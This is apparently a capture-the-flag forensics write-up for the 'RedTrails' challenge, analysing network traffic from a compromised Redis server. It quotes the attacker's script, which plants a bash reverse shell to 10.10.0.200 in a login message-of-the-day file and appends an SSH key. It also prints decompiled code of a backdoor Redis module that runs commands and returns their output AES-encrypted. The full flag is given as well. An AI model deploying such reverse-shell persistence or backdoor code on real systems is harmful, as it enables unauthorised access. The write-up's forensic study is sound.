# RedTrails
HTB challenge: medium
**Note:** I’m just an amateur and my English isn’t very good.
**Scenario:**
>Our SOC team detected suspicious activity on one of our redis instances. Despite the fact it was password protected, it seems that the attacker still obtained access to it. We need to put in place a remediation strategy as soon as possible; to do that it's necessary to gather more information about the attack used. NOTE: the flag is composed of three parts.
The challenge provides a capture.pcap file, so I use Wireshark to investigate.

Then I check TCP stream 0, which contains lots of information including an email address, an account password and also FLAG_PART==_c0uld_0p3n_n3w.

Scrolling to the end, I saw suspicious download requests.

The attacker had downloaded the file Vgly8V0Zxo over HTTP, so I exported it and got a text file that looks like a bash script.

It's obvious that $s is base64 that has been reversed. It can be recovered with the rev command on Linux or with the following Python code:
```python
# Undo the reversal applied to $s; the output is then base64-decoded
# (e.g. piped through `base64 -d`) to recover the original script.
text = input("Input text reversed: ").strip()
rev_text = text[::-1]
print(rev_text)
```
After reversing and base64-decoding, this bash script executes the following commands. We also get a part of the flag appended to the ssh-rsa key: ```HTB{r3d15_1n574nc35```
```bash
echo 'bash -c "bash -i >& /dev/tcp/10.10.0.200/1337 0>&1"' > /etc/update-motd.d/00-header
echo -e "\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC8Vkq9UTKMakAx2Zq+PnZNc6nYuEK3ZVXxH15bbUeB+elCb3JbVJyBfvAuZ0sonfAqZsyq9Jg6/KGtNsEmtVKXroPXhzFumTgg7Z1NvrUNvnqLIcfxTnP1+/4X284hp0bF2VbITb6oQKgzRdOs8GtOasKaK0k//2E5o0RKIEdrx0aL5HBOGPx0p8GrGe4kRKoAokGXwDVT22LlBylRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IfLMD/FQNy1B4DYhsY62O7o2xR0vxkBEp5UhBAX8gOTG0wjzrUHxmdUimXgiy39YVZaTJQwLBtzJS//YhkewyF/+CP0H7wIKIErlf5WFK5skLYO6uKVpx6akGXY8GADnPU3iPK/MtBC+RqWssdkGqFIA5xG2Fn+Klid9Obm1uXexJfYVjJMOfvuqtb6KcgLmi5uRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IlSxaiOAD2iNJboNuUIxMH/9HNYKd6mlwUpovqFcGBqXizcF21bxNGoOE31Vfox2fq2qW30BDWtHrrYi76iLh02FerHEYHdQAAA08NfUHyCw0fVl/qt6bAgKSb02k691lcDAo5JpEEzNQpub0X8xJItrbw==HTB{r3d15_1n574nc35" >> ~/.ssh/authorized_keys
```
This script overwrites the file ```/etc/update-motd.d/00-header``` with ```bash -c "bash -i >& /dev/tcp/10.10.0.200/1337 0>&1"``` (a reverse shell). When it runs, it starts an interactive bash, opens a TCP connection to 10.10.0.200 on port 1337 and redirects stdin, stdout and stderr to that socket, so the attacker gets a remote shell.
```/etc/update-motd.d/``` is a directory of scripts that run when a user logs in. If the file ```00-header``` is executable, the reverse shell is opened at every login.
The second command appends an SSH public key to ```~/.ssh/authorized_keys```, allowing the attacker to log in to that account with key-based authentication, without a password.
```AAAAB...trbw==``` is the SSH public key.
Subsequently, I discovered suspicious data in TCP stream 6 that may be an ELF file, so I extracted the raw data and converted it to an ELF file with the following script:

```python
output_file = input("Output file name: ").strip()

# raw.txt holds the hex dump of the TCP stream copied out of Wireshark
with open("raw.txt", "r") as file:
    raw = file.read()

# drop any whitespace/newlines copied along with the hex before decoding
hex_data = bytes.fromhex("".join(raw.split()))

with open(output_file, "wb") as file:
    file.write(hex_data)
print(f"[+] {len(hex_data)} bytes have been written to {output_file}")
```
After running this script I received an ELF file.

I use Ghidra to investigate it.

Function: DoCommand()
```C
undefined8 DoCommand(undefined8 param_1,long param_2,int param_3)
{
byte bVar1;
long lVar2;
code *pcVar3;
FILE *__stream;
int iVar4;
size_t sVar5;
char *pcVar6;
EVP_CIPHER *cipher;
size_t sVar7;
ulong uVar8;
undefined8 uVar9;
undefined8 uVar10;
long *plVar11;
long in_FS_OFFSET;
long local_1108 [3];
int local_10ec;
long local_10e8;
undefined8 local_10e0;
int local_10d8;
int local_10d4;
int local_10d0;
int local_10cc;
undefined1 local_10c8 [8];
size_t local_10c0;
uchar *local_10b8;
char *local_10b0;
FILE *local_10a8;
char *local_10a0;
char *local_1098;
char *local_1090;
EVP_CIPHER_CTX *local_1088;
long local_1080;
char *local_1078;
undefined8 local_1070;
uchar local_1068 [16];
uchar local_1058 [32];
byte local_1038 [4104];
long local_30;
plVar11 = local_1108;
local_30 = *(long *)(in_FS_OFFSET + 0x28);
local_10ec = param_3;
local_10e8 = param_2;
local_10e0 = param_1;
if (param_3 == 2) {
local_10c0 = 0x1000;
local_10b0 = (char *)(*RedisModule_StringPtrLen)(*(undefined8 *)(param_2 + 8),local_10c8);
local_10a8 = popen(local_10b0,"r");
local_10a0 = (char *)malloc(local_10c0);
local_10b8 = (uchar *)malloc(local_10c0);
while( true ) {
pcVar6 = fgets(local_10a0,8,local_10a8);
if (pcVar6 == (char *)0x0) break;
sVar7 = strlen(local_10a0);
sVar5 = strlen((char *)local_10b8);
if (local_10c0 <= sVar5 + sVar7) {
local_10b8 = (uchar *)realloc(local_10b8,local_10c0 * 4);
local_10c0 = local_10c0 << 1;
}
FUN_00107220(local_10b8,local_10a0);
}
local_1098 = "h02B6aVgu09Kzu9QTvTOtgx9oER9WIoz";
local_1090 = "YDP7ECjzuV7sagMN";
strncpy((char *)local_1058,"h02B6aVgu09Kzu9QTvTOtgx9oER9WIoz",0x20);
strncpy((char *)local_1068,local_1090,0x10);
local_1088 = EVP_CIPHER_CTX_new();
cipher = EVP_aes_256_cbc();
EVP_EncryptInit_ex(local_1088,cipher,(ENGINE *)0x0,local_1058,local_1068);
sVar7 = strlen((char *)local_10b8);
EVP_EncryptUpdate(local_1088,local_1038,&local_10d8,local_10b8,(int)sVar7);
local_10cc = local_10d8;
EVP_EncryptFinal_ex(local_1088,local_1038 + local_10d8,&local_10d8);
local_10cc = local_10cc + local_10d8;
EVP_CIPHER_CTX_free(local_1088);
iVar4 = local_10cc * 2 + 1;
local_1080 = (long)iVar4 + -1;
local_1108[0] = (long)iVar4;
local_1108[1] = 0;
uVar8 = (((long)iVar4 + 0xfU) / 0x10) * 0x10;
for (; plVar11 != (long *)((long)local_1108 - (uVar8 & 0xfffffffffffff000));
plVar11 = (long *)((long)plVar11 + -0x1000)) {
*(undefined8 *)((long)plVar11 + -8) = *(undefined8 *)((long)plVar11 + -8);
}
lVar2 = -(ulong)((uint)uVar8 & 0xfff);
if ((uVar8 & 0xfff) != 0) {
*(undefined8 *)((long)plVar11 + ((ulong)((uint)uVar8 & 0xfff) - 8) + lVar2) =
*(undefined8 *)((long)plVar11 + ((ulong)((uint)uVar8 & 0xfff) - 8) + lVar2);
}
local_1078 = (char *)((long)plVar11 + lVar2);
local_10d0 = 0;
for (local_10d4 = 0; pcVar6 = local_1078, local_10d4 < local_10cc; local_10d4 = local_10d4 + 1)
{
bVar1 = local_1038[local_10d4];
pcVar6 = local_1078 + local_10d0;
*(undefined8 *)((long)plVar11 + lVar2 + -8) = 0x10a314;
snprintf(pcVar6,3,"%02x",(ulong)bVar1);
local_10d0 = local_10d0 + 2;
}
local_1078[local_10cc * 2] = '\0';
*(undefined8 *)((long)plVar11 + lVar2 + -8) = 0x10a35e;
hexStringToBytes(pcVar6,local_1038);
pcVar6 = local_1078;
*(undefined8 *)((long)plVar11 + lVar2 + -8) = 0x10a36d;
sVar7 = strlen(pcVar6);
pcVar6 = local_1078;
pcVar3 = RedisModule_CreateString;
local_10cc = (int)(sVar7 >> 1);
*(undefined8 *)((long)plVar11 + lVar2 + -8) = 0x10a38f;
sVar7 = strlen(pcVar6);
pcVar6 = local_1078;
uVar10 = local_10e0;
*(undefined8 *)((long)plVar11 + lVar2 + -8) = 0x10a3a8;
uVar9 = (*pcVar3)(uVar10,pcVar6,sVar7);
uVar10 = local_10e0;
local_1070 = uVar9;
*(undefined8 *)((long)plVar11 + lVar2 + -8) = 0x10a3cf;
(*RedisModule_ReplyWithString)(uVar10,uVar9);
__stream = local_10a8;
*(undefined8 *)((long)plVar11 + lVar2 + -8) = 0x10a3de;
pclose(__stream);
uVar10 = 0;
}
else {
uVar10 = (*RedisModule_WrongArity)(param_1);
}
if (local_30 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return uVar10;
}
```
**Summary:**

**Source: chatgpt :>>>**
The AES key and IV are ```h02B6aVgu09Kzu9QTvTOtgx9oER9WIoz``` and ```YDP7ECjzuV7sagMN```, respectively; the 32-byte key and the EVP_aes_256_cbc call mean AES-256-CBC. So I think we need to find something to decrypt to get the final part of the flag.

After downloading and executing the file ```Vgly8V0Zxo```, the attacker sent some requests to the victim.
I tried to convert ```3948...4952``` to a file, but it is actually text, so I guessed that it's ciphertext. Let's decrypt it with CyberChef (AES-256-CBC with the key and IV above) and get the flag!
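As an added example (not part of the original writeup or the challenge files), the following Go program reproduces both sides of what the decompiled DoCommand does with its hard-coded key and IV: the module side (AES-256-CBC over the command output, then hex, which is what ends up in the Redis reply) and the analyst side (the hex string from the capture back to plaintext, the same thing the CyberChef recipe does). The sample command output is constructed; the real hex response from the pcap is not reproduced here.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/hex"
	"errors"
)

// Key and IV exactly as strncpy'd in the decompiled DoCommand:
// a 32-byte key selects AES-256, the IV is one 16-byte block.
const (
	aesKey = "h02B6aVgu09Kzu9QTvTOtgx9oER9WIoz"
	aesIV  = "YDP7ECjzuV7sagMN"
)

// EncryptReply reproduces the module's reply: AES-256-CBC over the popen()
// output with PKCS#7 padding (EVP_EncryptFinal_ex default), then lowercase hex.
func EncryptReply(output string) (string, error) {
	block, err := aes.NewCipher([]byte(aesKey))
	if err != nil {
		return "", err
	}
	n := aes.BlockSize - len(output)%aes.BlockSize
	padded := append([]byte(output), bytes.Repeat([]byte{byte(n)}, n)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, []byte(aesIV)).CryptBlocks(ct, padded)
	return hex.EncodeToString(ct), nil
}

// DecryptReply is the analyst side: hex from the pcap back to the command output.
func DecryptReply(hexCT string) (string, error) {
	ct, err := hex.DecodeString(hexCT)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext is not a whole number of AES blocks")
	}
	block, err := aes.NewCipher([]byte(aesKey))
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, []byte(aesIV)).CryptBlocks(pt, ct)
	n := int(pt[len(pt)-1]) // bad padding means wrong key/IV or truncated data
	if n == 0 || n > aes.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return "", errors.New("bad PKCS#7 padding: wrong key/IV or truncated ciphertext")
	}
	return string(pt[:len(pt)-n]), nil
}
```

Feeding the captured hex reply to DecryptReply gives the same plaintext as the CyberChef AES Decrypt operation with this key and IV.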

```_un3xp3c73d_7r41l5!}```
> Flag: HTB{r3d15_1n574nc35_c0uld_0p3n_n3w_un3xp3c73d_7r41l5!}